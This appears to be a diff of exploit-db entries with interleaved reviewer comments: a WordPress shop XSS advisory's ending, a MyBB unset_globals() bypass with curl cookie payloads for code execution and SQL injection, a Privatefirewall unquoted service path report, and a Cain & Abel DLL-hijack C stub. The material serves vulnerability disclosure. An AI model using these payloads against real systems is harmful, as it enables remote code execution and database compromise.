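+https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
+https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php
+https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[x]
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the vulnerable setting_shopdetail values in the input POST method request.
+Restrict the input fields of the tags, blogname and blog slogan to prevent persistent script code injection attacks.
+Setup the error exception above to the input mask and reconfigure it to capture the events correctly.
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation web vulnerability in the shopsystem is estimated as medium. (CVSS 3.1)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+COMPANY: Evolution Security GmbH
+BUSINESS: www.evolution-sec.com
+
+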
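Review bot: The session logs reproduce live authentication material — `PHPSESSID`, `wordpress_sec_…` and `wordpress_logged_in_…` cookies complete with their HMAC fragments — which should be redacted before publication even though they have very likely expired; a PoC needs the request shape and the POST body, not the author's session. The severity is also internally inconsistent: the CVSS header says 3.1, the technical details say 3.2, and the Security Risk section says 3.1 again, and the release date (2014-11-07) disagrees with the disclosure timeline (2014-11-05), so one of each pair should be corrected. The quoted vendor blurb reads `You have to be an expert to work with the SUPR Shop.`, which from context is a dropped "don't" in the vendor text and is worth marking `[sic]` so it is not read as the advisory's own claim.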
304
platforms/php/webapps/35323.md
Executable file
|
@ -0,0 +1,304 @@
|
|||
# Exploit Title: MyBB <= 1.8.2 unset_globals() Function Bypass and Remote
|
||||
Code Execution Vulnerability
|
||||
# Date: 2014-11-21
|
||||
# Exploit Author: Taoguang Chen
|
||||
# Vendor Homepage: twitter.com/chtg57
|
||||
# Software Link: www.mybb.com
|
||||
# Version: MyBB 1.8 <= 1.8.2 and MyBB 1.6 <= 1.6.15
|
||||
|
||||
MyBB had released 1.8.3 and 1.6.16 to fixed this vulnerability.
|
||||
|
||||
Advisory: https://gist.github.com/chtg/e9824db42a8edf302b0e
|
||||
|
||||
|
||||
|
||||
|
||||
#MyBB <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution Vulnerability
|
||||
|
||||
Taoguang Chen <[@chtg](http://github.com/chtg)> - 2014.03.06
|
||||
|
||||
> MyBB's unset_globals() function can be bypassed under special conditions and it is possible to allows remote code execution.
|
||||
|
||||
##I. MyBB's unset_globals() Function Bypass
|
||||
|
||||
When PHP's register\_globals configuration set on, MyBB will call unset\_globals() function, all global variables registered by PHP from $\_POST, $\_GET, $\_FILES, and $\_COOKIE arrays will be destroyed.
|
||||
|
||||
```
|
||||
if(@ini_get("register_globals") == 1)
|
||||
{
|
||||
$this->unset_globals($_POST);
|
||||
$this->unset_globals($_GET);
|
||||
$this->unset_globals($_FILES);
|
||||
$this->unset_globals($_COOKIE);
|
||||
}
|
||||
...
|
||||
}
|
||||
...
|
||||
function unset_globals($array)
|
||||
{
|
||||
if(!is_array($array))
|
||||
{
|
||||
return;
|
||||
}
|
||||
|
||||
foreach(array_keys($array) as $key)
|
||||
{
|
||||
unset($GLOBALS[$key]);
|
||||
unset($GLOBALS[$key]); // Double unset to circumvent the zend_hash_del_key_or_index hole in PHP <4.4.3 and <5.1.4
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
But unset\_globals() function can be bypassed.
|
||||
|
||||
###i) $\_GET, $\_FILES, or $\_COOKIE Array was Destroyed
|
||||
|
||||
```
|
||||
foo.php?_COOKIE=1
|
||||
// $_GET['_COOKIE']
|
||||
```
|
||||
|
||||
When $_GET['\_COOKIE']=1 is sent, unset\_globals() will destroy $GLOBALS['\_COOKIE'].
|
||||
|
||||
```
|
||||
$this->unset_globals($_GET);
|
||||
...
|
||||
}
|
||||
...
|
||||
function unset_globals($array)
|
||||
{
|
||||
...
|
||||
foreach(array_keys($array) as $key)
|
||||
{
|
||||
unset($GLOBALS[$key]);
|
||||
```
|
||||
|
||||
This means $\_COOKIE array will be destroyed. This also means all global variables registered by PHP from $\_COOKIE array will be destroyed because them will not be handled by unset().
|
||||
|
||||
```
|
||||
$this->unset_globals($_COOKIE);
|
||||
}
|
||||
...
|
||||
}
|
||||
...
|
||||
function unset_globals($array)
|
||||
{
|
||||
if(!is_array($array))
|
||||
{
|
||||
return;
|
||||
}
|
||||
```
|
||||
|
||||
By the same token, if $\_GET or $\_FILES array was destroyed via unset\_globals(), the corresponding global variables registered by PHP will not be destroyed.
|
||||
|
||||
###ii) $GLOBALS Array was Destroyed
|
||||
|
||||
```
|
||||
foo.php?GLOBALS=1
|
||||
// $_GET['GLOBALS']
|
||||
```
|
||||
|
||||
When $\_GET['GLOBALS']=1 is sent, unset\_globals() will destroy $GLOBALS['GLOBALS']. This means $GLOBALS array will be destroyed.
|
||||
|
||||
$GLOBALS array is a automatic global variable, and binding with global symbol table, you can use $GLOBALS['key'] to access or control a global variable in all scopes throughout a script. This means that the binding between the $GLOBALS array and the global symbol table will be broken because $GLOBALS array has been destroyed. This also means all variables registered by PHP from $\_GET, $\_FILES and $\_COOKIE arrays will not be destroyed.
|
||||
|
||||
By the same token, when $\_POST['GLOBALS'], $\_FLIES['GLOBALS'], or $\_COOKIE['GLOBALS'] is sent, unset\_globals() will destroy $GLOBALS array, then the corresponding global variables registered by PHP will not be destroyed.
|
||||
|
||||
In fact, MyBB is already aware of the problem:
|
||||
|
||||
```
|
||||
$protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS");
|
||||
foreach($protected as $var)
|
||||
{
|
||||
if(isset($_REQUEST[$var]) || isset($_FILES[$var]))
|
||||
{
|
||||
die("Hacking attempt");
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Unfortunately, there is a small hole yet:-)
|
||||
|
||||
$\_REQUEST is an associative array that by default contains mix of $\_GET, $\_POST, and $\_COOKIE arrays data.
|
||||
|
||||
But PHP >= 5.3 introduced request\_order configuration, the directive affects the contents of $\_REQUEST array.
|
||||
|
||||
```
|
||||
request_order = "GP"
|
||||
```
|
||||
|
||||
This is recommended setting in php.ini. Set it to "GP" means only $\_GET and $\_POST arrays data is merged into $\_REQUEST array without $\_COOKIE array data.
|
||||
|
||||
So, it is possible that sent $\_COOKIE['GLOBALS'], then bypass unset\_globals() function in PHP 5.3.
|
||||
|
||||
##II. Remote Code Execution Vulnerability
|
||||
|
||||
There is one interesting method in MyBB:
|
||||
|
||||
```
|
||||
class MyBB {
|
||||
...
|
||||
function __destruct()
|
||||
{
|
||||
// Run shutdown function
|
||||
if(function_exists("run_shutdown"))
|
||||
{
|
||||
run_shutdown();
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Look into run\_shutdown() function:
|
||||
|
||||
```
|
||||
function run_shutdown()
|
||||
{
|
||||
global $config, $db, $cache, $plugins, $error_handler, $shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;
|
||||
...
|
||||
// Run any shutdown functions if we have them
|
||||
if(is_array($shutdown_functions))
|
||||
{
|
||||
foreach($shutdown_functions as $function)
|
||||
{
|
||||
call_user_func_array($function['function'], $function['arguments']);
|
||||
}
|
||||
}
|
||||
|
||||
$done_shutdown = true;
|
||||
}
|
||||
```
|
||||
|
||||
The $shutdown\_functions was initialized via add\_shutdown() function in init.php:
|
||||
|
||||
```
|
||||
// Set up any shutdown functions we need to run globally
|
||||
add_shutdown('send_mail_queue');
|
||||
```
|
||||
|
||||
But add\_shutdown() function initialization handler is wrong:
|
||||
|
||||
```
|
||||
function add_shutdown($name, $arguments=array())
|
||||
{
|
||||
global $shutdown_functions;
|
||||
|
||||
if(!is_array($shutdown_functions))
|
||||
{
|
||||
$shutdown_functions = array();
|
||||
}
|
||||
|
||||
if(!is_array($arguments))
|
||||
{
|
||||
$arguments = array($arguments);
|
||||
}
|
||||
|
||||
if(is_array($name) && method_exists($name[0], $name[1]))
|
||||
{
|
||||
$shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
|
||||
return true;
|
||||
}
|
||||
else if(!is_array($name) && function_exists($name))
|
||||
{
|
||||
$shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
|
||||
return true;
|
||||
}
|
||||
|
||||
return false;
|
||||
}
|
||||
```
|
||||
|
||||
In the above code we see that run\_shutdown() function is vulnerable because $shutdown\_functions is initialized correctly and therefore result in arbitrary code execution.
|
||||
|
||||
##III. Proof of Concept
|
||||
|
||||
When request\_order = "GP" and register\_globals = On, remote code execution by just using curl on the command line:
|
||||
|
||||
```
|
||||
$ curl --cookie "GLOBALS=1; shutdown_functions[0][function]=phpinfo; shutdown_functions[0][arguments][]=-1" http://www.target/
|
||||
```
|
||||
|
||||
##IV. P.S.I
|
||||
|
||||
**Another case to exploit the vulnerability:**
|
||||
|
||||
When PHP's "disable\_functions" configuration directive disable ini\_get() function:
|
||||
|
||||
```
|
||||
disable_functions = ini_get
|
||||
```
|
||||
|
||||
The unset\_globals() function will not be called that regardless of register\_globals set on or off.
|
||||
|
||||
```
|
||||
if(@ini_get("register_globals") == 1)
|
||||
{
|
||||
$this->unset_globals($_POST);
|
||||
$this->unset_globals($_GET);
|
||||
$this->unset_globals($_FILES);
|
||||
$this->unset_globals($_COOKIE);
|
||||
}
|
||||
```
|
||||
|
||||
**Proof of Concept**
|
||||
|
||||
Works on disable\_functions = ini\_get and register\_globals = On:
|
||||
|
||||
```
|
||||
index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1
|
||||
```
|
||||
|
||||
##V. P.S.II
|
||||
|
||||
**SQL injection vulnerability via run\_shutdown() function**
|
||||
|
||||
```
|
||||
function run_shutdown()
|
||||
{
|
||||
global $config, $db, $cache, $plugins, $error_handler, $shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;
|
||||
...
|
||||
// We have some shutdown queries needing to be run
|
||||
if(is_array($shutdown_queries))
|
||||
{
|
||||
// Loop through and run them all
|
||||
foreach($shutdown_queries as $query)
|
||||
{
|
||||
$db->query($query);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
The $shutdown\_queries was initialized in global.php:
|
||||
|
||||
```
|
||||
$shutdown_queries = array();
|
||||
```
|
||||
|
||||
But not all files are included global.php, such as css.php:
|
||||
|
||||
```
|
||||
require_once "./inc/init.php";
|
||||
```
|
||||
|
||||
There is not included global.php, and $shutdown\_queries is uninitialized, with the result that there is a SQL injection vulnerability.
|
||||
|
||||
**Proof of Concept**
|
||||
|
||||
Works on request\_order = "GP" and register\_globals = On:
|
||||
|
||||
```
|
||||
$ curl --cookie "GLOBALS=1; shutdown_queries[]=SQL_Inj" http://www.target/css.php
|
||||
```
|
||||
|
||||
Works on disable\_functions = ini\_get and register\_globals = On:
|
||||
|
||||
```
|
||||
css.php?shutdown_queries[]=SQL_Inj
|
||||
```
|
||||
|
||||
##VI. Disclosure Timeline
|
||||
|
||||
* 2014.03.06 - Notified the MyBB devs via security contact form
|
||||
* 2014.11.16 - Renotified the MyBB devs via Private Inquiries forum because no reply
|
||||
* 2014.11.20 - MyBB developers released MyBB 1.8.3 and MyBB 1.6.16
|
||||
* 2014.11.21 - Public Disclosure
|
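Review bot: The sentence following the add_shutdown() listing states the opposite of the argument the section makes: "run\_shutdown() function is vulnerable because $shutdown\_functions is initialized correctly" should read `is not initialized correctly`, since the point of the preceding snippet is that add\_shutdown() keeps a pre-existing $shutdown\_functions array rather than resetting it. The header metadata is also crossed: "Vendor Homepage" carries the author's Twitter handle and "Software Link" carries the vendor site, so the two values should be swapped. Minor wording in the same header block: `to fixed this vulnerability` should be `to fix this vulnerability`. The remediation is otherwise clear from the text (MyBB 1.8.3 / 1.6.16), so only the prose needs correcting.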
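--- a/platforms/windows/local/35322.txt
+++ b/platforms/windows/local/35322.txt
@@ -0,0 +1,68 @@
+Privacyware Privatefirewall 7.0 Unquoted Service Path Privilege Escalation
+
+
+Vendor: PWI, Inc.
+Product web page: http://www.privacyware.com
+Affected version: 7.0.30.3
+
+
+Summary: Privatefirewall multi-layered endpoint security software protects
+32 and 64 bit Windows desktops and servers from malware and unauthorized use.
+Personal firewall, packet inspection, URL filtering, anti-logger, process
+monitor, and application/system behavior modeling and anomaly detection
+components stop hackers, spyware, viruses and other forms of malware before
+they can cause damage.
+
+Desc: Privatefirewall suffers from an unquoted search path issue impacting
+the Core Service 'PFNet' service for Windows deployed as part of Privatefirewall
+bundle. This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system. A
+successful attempt would require the local user to be able to insert their
+code in the system root path undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user?s code would execute with the elevated privileges
+of the application.
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+Microsoft Windows 7 Ultimate SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+
+
+Advisory ID: ZSL-2014-5209
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5209.php
+
+
+09.11.2014
+
+---
+
+
+C:\Users\user>sc qc PFNet
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: PFNet
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe
+LOAD_ORDER_GROUP : TDI
+TAG : 0
+DISPLAY_NAME : Privacyware network service
+DEPENDENCIES : RpcSs
+SERVICE_START_NAME : LocalSystem
+
+
+--
+
+C:\Users\user>icacls "C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe"
+C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe NT AUTHORITY\SYSTEM:(I)(F)
+BUILTIN\Administrators:(I)(F)
+BUILTIN\Users:(I)(RX)
+
+Successfully processed 1 files; Failed processing 0 files
+
+
+--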
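Review bot: The evidence shown does not establish exploitability: the icacls output is for pfsvc.exe itself, and the Users entry there is `(I)(RX)`, i.e. read/execute only, which is the expected state and is not what an unquoted-path issue depends on. What matters for this class of bug is whether a non-privileged user can create files in the directories that precede the space-separated components of the BINARY_PATH_NAME; the advisory should include the ACLs of those directories, or state that on a default install they are not writable and the issue is therefore conditional. The remediation is also missing and is one line: quote the service's binary path so it reads `"C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe"`. The apostrophe in "the local user?s code" is mis-encoded and should be `user's`.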
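--- a/platforms/windows/remote/35318.c
+++ b/platforms/windows/remote/35318.c
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/46239/info
+
+Cain & Abel is prone to an arbitrary-code-execution vulnerability.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
+
+Cain & Abel 2.7.3 is vulnerable; other versions may also be affected.
+
+#include <windows.h>
+#define DllExport __declspec (dllexport)
+DllExport void DwmSetWindowAttribute() { egg(); }
+
+int pwnme()
+{
+MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK);
+exit(0);
+return 0;
+}
+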
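Review bot: The listing is internally inconsistent: the exported `DwmSetWindowAttribute` calls `egg()`, which is neither declared nor defined anywhere in the file, while the only function actually defined is `pwnme()`, so as written this cannot link (and `egg()` is an implicit declaration, an error in C99 and later). The two names should agree, with a prototype ahead of the use, e.g. `int pwnme(void);` before the export line and `DllExport void DwmSetWindowAttribute(void) { pwnme(); }`. `exit(0)` is used without `<stdlib.h>`; whether `<windows.h>` pulls it in transitively depends on the toolchain, so the include should be explicit, and a one-line comment noting that `exit()` here terminates the hosting process would help a reader understand the observable effect. The prose header occupies the first eight lines outside any comment, which is the usual exploit-db convention but means the file is not compilable as committed; a note to that effect, or wrapping the header in `/* ... */`, would make that explicit.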